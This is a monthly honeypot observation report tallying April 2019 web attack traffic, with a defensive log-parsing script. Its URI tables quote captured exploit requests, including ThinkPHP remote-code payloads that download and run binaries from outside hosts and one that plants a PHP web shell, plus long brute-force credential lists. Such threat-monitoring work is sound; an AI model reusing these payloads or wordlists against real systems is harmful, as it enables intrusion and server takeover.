April 2019 BW-pot observation summary

1. Top screen

[screenshot: BW-pot top screen]


Since I started running BW-pot, this is the first month I have operated it for a full calendar month.
It reaches as many as 12,400 accesses.

2. One-month line graph

[screenshot: one-month line graph of accesses]


The peak is in the first half of the month.
The second half feels like it is coasting.

3. GET requests (top 100)

No. URI Count
1 / 4244
2 /manager/html 3291
3 /wp-login.php 128
4 /index.action 25
5 /TP/public/index.php 23
6 //a2billing/customer/templates/default/footer.tpl 21
7 /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 20
8 //recordings/ 20
9 //about.php 20
10 //admin/config.php 20
11 /phpMyAdmin/scripts/setup.php 16
12 /phpmyadmin/scripts/setup.php 15
13 /.env 15
14 /w00tw00t.at.blackhats.romanian.anti-sec:) 14
15 /pma/scripts/setup.php 14
16 /favicon.ico 13
17 /echo.php 12
18 //vtigercrm/vtigerservice.php 12
19 /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1]= 'wget http[:]//185.244.25.131/x86 -O .Akari; chmod +x .Akari; rm -rf .Akari x86; history -c -w;exit;logout;' 11
20 /robots.txt 10
21 /sitemap.xml 9
22 /myadmin/scripts/setup.php 9
23 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=root123 9
24 /MyAdmin/scripts/setup.php 9
25 /mysql/admin/index.php?lang=en 8
26 /.well-known/security.txt 8
27 /colibri/conferences 8
28 /phpmyadmin/index.php?lang=en&pma_username=sql&pma_password=sql 8
29 /phpmyadmin/index.php?lang=en&pma_username=pma&pma_password=pma 8
30 /mysql/sqlmanager/index.php?lang=en 8
31 /mysql/mysqlmanager/index.php?lang=en 8
32 /w00tw00t.at.ISC.SANS.DFind:) 8
33 /phpmyadmin/index.php?lang=en 8
34 /latest/meta-data 8
35 /mysql/dbadmin/index.php?lang=en 8
36 /manager/html/ 8
37 /phpmyadmin/index.php?lang=en&pma_username=popa3d&pma_password=popa3d 8
38 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=password123 7
39 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=pass2019 7
40 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=user 7
41 /phpmy/scripts/setup.php 7
42 /script 7
43 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=p455w0rd 7
44 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=host 7
45 /phpmyadmin/index.php?lang=en&pma_username=admin&pma_password=root 7
46 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=trustno1 7
47 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=backupdb 7
48 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=2020 7
49 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=webmaster 6
50 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=123 6
51 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=1234567890 6
52 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password= 6
53 /phpmyadmin/index.php?lang=en&pma_username=shopdb&pma_password=shopdb 6
54 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=666666 6
55 /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1]=wget%20http[:]//81.6.42.123/a_thk.sh%20-O%20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a; 6
56 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=users 6
57 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=rootadmin 6
58 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=12345 6
59 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=confidential 6
60 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=123456789 6
61 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=db 6
62 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=databases 6
63 /phpmyadmin/index.php?lang=en&pma_username=admin&pma_password=admin 6
64 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=web 6
65 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=password2019 6
66 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=passw0rd 6
67 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=2013 6
68 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=security 6
69 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=toor321 6
70 /HNAP1/ 6
71 /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]=echo%20^<?php%20$action%20=%20$_GET['xcmd'];system($action);?^>>hydra.php 6
72 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=linux 6
73 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=football 6
74 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=unix 5
75 /phpmyadmin/index.php?lang=en&pma_username=wordpress&pma_password=wordpress 5
76 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=dollars 5
77 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=qazwsx 5
78 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=123456 5
79 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=blog 5
80 /phpmyadmin/index.php?lang=en&pma_username=wordpress&pma_password=password 5
81 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=12qwaszx 5
82 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=4321 5
83 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=password1 5
84 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=2014 5
85 /phpmyadmin/index.php?lang=en&pma_username=ueer&pma_password=pass 5
86 /phpmyadmin/index.php?lang=en&pma_username=blog&pma_password=blog 5
87 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=music 5
88 /phpmyadmin/index.php?lang=en&pma_username=admin&pma_password=123 5
89 /phpmyadmin/index.php?lang=en&pma_username=admin&pma_password=pass 5
90 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=321 5
91 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=root1234 5
92 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=54321 5
93 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=backupdbs 5
94 /struts2-rest-showcase/orders.xhtml 5
95 /index.do 5
96 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=test 5
97 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=ROOT 5
98 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=freedom 5
99 /phpmyadmin/index.php?lang=en&pma_username=apache&pma_password=apache 5
100 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=onetwothree 5


4. POST requests

No. URI Count
1 /phpmyadmin/index.php 1038
2 /wp-login.php 123
3 /xmlrpc.php 121
4 /tmUnblock.cgi 47
5 /TP/public/index.php?s=captcha 18
6 /users?page=&size=5 11
7 /sdk 4
8 /invoker/readonly 4
9 /pk1914.php 1
10 /login.action 1
11 /Alarg53.php 1
12 /Skri.php 1
13 /GponForm/diag_Form?images/ 1
14 /xx.php 1
15 /qaq.php 1
16 /db_dataml.php 1
17 /sllolx.php 1
18 / 1
19 /lapan.php 1
20 /db.init.php 1
21 /db_desql.php 1
22 /db_session.init.php 1
23 /w.php 1
24 /p34ky1337.php 1
25 /xw1.php 1
26 /s.php 1
27 /wuwu11.php 1
28 /wc.php 1
29 /9678.php 1


5. phpMyAdmin usernames

No. User Count
1 root 1783
2 admin 23
3 wordpress 17
4 sql 8
5 popa3d 8
6 pma 8
7 shopdb 6
8 blog 5
9 shop 5
10 apache 5
11 ueer 5
12 joomla 4
13 db 4
14 nas 4
15 money 3
16 wp 3
17 dbs 2
18 http 2
19 project 2
20 nginx 2
21 web 1


6. phpMyAdmin passwords (top 100)

No. Password Count
1 pass 16
2 blog 14
3 root 13
4 admin 12
5 123 12
6 password 11
7 db 10
8 null 9
9 wordpress 9
10 root123 9
11 123456789 8
12 popa3d 8
13 football 8
14 pma 8
15 sql 8
16 shop 8
17 666666 7
18 2020 7
19 test 7
20 1234567890 7
21 trustno1 7
22 password123 7
23 dragon 7
24 host 7
25 backupdb 7
26 web 7
27 pass2019 7
28 123456 7
29 12345 7
30 p455w0rd 7
31 user 7
32 databases 6
33 12345678 6
34 users 6
35 webmaster 6
36 4321 6
37 qwerty 6
38 freedom 6
39 toor321 6
40 mysql 6
41 confidential 6
42 security 6
43 starwars 6
44 12qwaszx 6
45 password2019 6
46 2013 6
47 linux 6
48 rootadmin 6
49 shopdb 6
50 qazwsx 6
51 passw0rd 6
52 solo 5
53 onetwothree 5
54 password1 5
55 dbs 5
56 111111 5
57 monkey 5
58 backupdbs 5
59 password2018 5
60 administrator 5
61 dollars 5
62 queen 5
63 apache 5
64 ROOT 5
65 321 5
66 54321 5
67 2014 5
68 1234567 5
69 music 5
70 2016 5
71 test123 5
72 sunshine 5
73 123123 5
74 1234 5
75 unix 5
76 root1234 5
77 abc123 5
78 iloveyou 4
79 backups 4
80 toor123 4
81 login 4
82 whatever 4
83 webadmin 4
84 senha 4
85 a123456 4
86 gameserver 4
87 r00t 4
88 secure 4
89 aa123456 4
90 oracle 4
91 654321 4
92 nas 4
93 access 4
94 hello 4
95 joomla 4
96 xampp 4
97 toor 4
98 rock 4
99 acces 4
100 trump 4
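The daily series in section 2, the top-URI tables in sections 3 and 4, and the phpMyAdmin username/password tables in sections 5 and 6 can all be produced from the honeypot's web access log with a short script. The one below is an added example written for this write-up, not BW-pot's own code; it assumes the honeypot writes Apache/Nginx "combined"-format lines, and the sample lines embedded in it are constructed, not real captures. It also tags requests that carry the two mass-scanner markers that appear in section 3 (the `w00tw00t` probes and the ThinkPHP `invokefunction` probes), so a defender can separate noisy scanners from the credential-guessing traffic.

```python
"""Aggregate honeypot web access logs into the kinds of tables shown above.

Added example for this write-up; it is not BW-pot's own code. It assumes the
honeypot writes Apache/Nginx "combined" log lines. The sample lines below are
constructed, not real captures.
"""
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines (not real BW-pot traffic). Note the doubled
# backslashes in the ThinkPHP probe: in a normal Python string "\t" would become
# a tab, which is exactly how "\think\app" ends up garbled in exported tables.
SAMPLE_LOG = """\
203.0.113.10 - - [02/Apr/2019:10:01:02 +0900] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"
203.0.113.10 - - [02/Apr/2019:10:01:03 +0900] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"
203.0.113.10 - - [02/Apr/2019:10:01:04 +0900] "GET /manager/html HTTP/1.1" 401 0 "-" "Mozilla/5.0"
198.51.100.7 - - [03/Apr/2019:11:15:00 +0900] "GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=root123 HTTP/1.1" 200 0 "-" "-"
198.51.100.7 - - [03/Apr/2019:11:15:01 +0900] "GET /phpmyadmin/index.php?lang=en&pma_username=root&pma_password= HTTP/1.1" 200 0 "-" "-"
198.51.100.7 - - [03/Apr/2019:11:15:02 +0900] "GET /phpmyadmin/index.php?lang=en&pma_username=admin&pma_password=admin HTTP/1.1" 200 0 "-" "-"
192.0.2.55 - - [05/Apr/2019:02:00:00 +0900] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 0 "-" "-"
192.0.2.55 - - [05/Apr/2019:02:00:01 +0900] "GET /index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 HTTP/1.1" 404 0 "-" "-"
203.0.113.10 - - [06/Apr/2019:10:01:02 +0900] "POST /phpmyadmin/index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
203.0.113.10 - - [06/Apr/2019:10:01:03 +0900] "POST /phpmyadmin/index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
203.0.113.10 - - [06/Apr/2019:10:01:05 +0900] "POST /xmlrpc.php HTTP/1.1" 405 0 "-" "Mozilla/5.0"
"""

# Combined log format: client, ident, user, [timestamp], "METHOD URI HTTP/x", status ...
# The URI group is non-greedy so request targets containing spaces still parse.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>.*?) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Substrings of the mass-scanner requests listed in the GET table; used only to tag records.
SIGNATURES = {
    "w00tw00t-scanner": "w00tw00t.at.",
    "thinkphp-invokefunction-probe": "invokefunction&function=call_user_func_array",
}


def parse_log(text):
    """Parse combined-format lines into dicts; lines that do not match are skipped."""
    records = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            records.append(m.groupdict())
    return records


def requests_per_day(records):
    """Requests per calendar day, the series behind the monthly line graph."""
    return Counter(r["ts"].split(":", 1)[0] for r in records)


def top_uris(records, method, n=100):
    """Most common request targets for one HTTP method, query string included."""
    return Counter(r["uri"] for r in records if r["method"] == method).most_common(n)


def phpmyadmin_credentials(records):
    """Usernames and passwords tried against phpMyAdmin through the URL query string.

    A blank password is kept as '' so empty-password attempts are still counted.
    """
    users, passwords = Counter(), Counter()
    for r in records:
        parts = urlsplit(r["uri"])
        if "phpmyadmin" not in parts.path.lower():
            continue
        qs = parse_qs(parts.query, keep_blank_values=True)
        if "pma_username" in qs:
            users[qs["pma_username"][0]] += 1
            passwords[qs.get("pma_password", [""])[0]] += 1
    return users, passwords


def scanner_signatures(records):
    """Tag requests carrying a known scanner marker, as (client IP, tag) pairs."""
    hits = []
    for r in records:
        for tag, marker in SIGNATURES.items():
            if marker in r["uri"]:
                hits.append((r["ip"], tag))
    return hits


if __name__ == "__main__":
    recs = parse_log(SAMPLE_LOG)
    print("per day:", dict(requests_per_day(recs)))
    print("top GET:", top_uris(recs, "GET", 5))
    print("top POST:", top_uris(recs, "POST", 5))
    print("pma users/passwords:", phpmyadmin_credentials(recs))
    print("scanner hits:", scanner_signatures(recs))
```

Because `top_uris` keys on the full request target, each phpMyAdmin username/password pair shows up as its own row, which is why the GET table above is dominated by near-identical `/phpmyadmin/index.php?...` entries; `phpmyadmin_credentials` collapses those rows into the per-user and per-password counts of sections 5 and 6.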


7. WordPress usernames

No. User Count
1 (blank) 117
2 admin1 2


8. WordPress passwords

No. Password Count
1 1234 9
2 123456 9
3 123456789 6
4 12345 5
5 1234567 5
6 12345678 5
7 pass 4
8 admin1 4
9 password 4
10 1 4
11 123 4
12 [login] 4
13 admin123 3
14 60 2
15 1.23457E+19 2
16 adminadmin 2
17 [asDomaincom]123 2
18 12345qwe 2
19 1234567890 2
20 Admin 2
21 0 2
22 news 2
23 ADMIN 2
24 2 2
25 putun 2
26 @admin 2
27 admin 2
28 qwe 2
29 ADMIN1 2
30 administrator 2
31 [asDomaincom] 2
32 admin123456 2
33 52.14.60.236 2
34 ADMIN123 2
35 webadmin123 1
36 1qaz2wsx 1
37 qwertyui 1
38 123qwe 1
39 qwertyu 1
40 qazwsxedcrfvtgbyhnujmik,ol 1
41 qwertyuiop 1
42 poiuytrewq 1
43 1234567890qwertyuiop 1
44 webadmin 1
45 qwerty 1


9. Tomcat usernames

No. User Count
1 tomcat 558
2 admin 553
3 manager 411
4 user 400
5 administrator 400
6 both 400
7 adminScript 363
8 root 148
9 (blank) 49
10 password 1
11 scott 1


10. Tomcat passwords

No. Password Count
1 (blank) 127
2 admin 119
3 tomcat 119
4 123456 107
5 12345 103
6 manager 86
7 password 77
8 12345678 76
9 1234567 76
10 123456789 76
11 123 76
12 1234 76
13 dragon 72
14 monkey 72
15 88888888 72
16 qwertyuiop 72
17 111111 72
18 888888 72
19 1234567890 72
20 654321 72
21 qwerty 72
22 1qaz2wsx 72
23 666666 72
24 abc123 72
25 s3cret 70
26 starwars 69
27 princess 69
28 admin888 69
29 letmein 69
30 master 69
31 admin123 69
32 baseball 69
33 passw0rd 69
34 solo 69
35 admin123!@# 69
36 welcome 69
37 football 69
38 login 69
39 gts@05 69
40 root 38
41 both 10
42 user 10
43 administrator 10
44 adminScript 10
45 tomcat123 3
46 121212 3
47 gwerty123 3
48 123123 3
49 789456123 3
50 password1 3
51 zxcvbnm 3
52 qwerty1 3
53 5201314 3
54 1 3
55 12345a 3
56 159753 3
57 admin1 3
58 333333 3
59 123qwe 3
60 root1 3
61 777777 3
62 112233 3
63 qazwsx 3
64 fuckyou 3
65 a123456 3
66 iloveyou 3
67 1q2w3e4r5t 3
68 jordan23 3
69 abcd1234 3
70 asdfgh 3
71 qwerty123 3
72 11111 3
73 11111111 3
74 123456a 3
75 aaaaaa 3
76 goodluck 3
77 0 3
78 tinkle 3
79 2580 3
80 999999 3
81 a12345 3
82 changethis 3
83 789456 3
84 good 3
85 123abc 3
86 1g2w3e4r 3
87 123123123 3
88 1q2w3e 3
89 apache 3
90 love123 3
91 qwe123 3
92 987654321 3
93 123456789a 3
94 1234qwer 3
95 123321 3
96 asdf 3
97 apache1 3
98 tomcat1 3
99 tomcat123456 3
100 555555 3
101 asd123 3
102 123654 3
103 222222 3
104 12qwaszx 3
105 7777777 3
106 1q2w3e4r 3
107 j5Brn9 1
108 tiger 1


11. Summary

My overall impression is simply that there were a lot of accesses.
Also, it was all reconnaissance; no follow-on attacks came after it.


Some of the password attempts did succeed, but the attacks do not continue.
Perhaps they have set up a scheduled task of some kind and just left it running.


Access was low in the second half of April, so it is also possible they are tallying up results and preparing during this period.
May and June may call for some caution.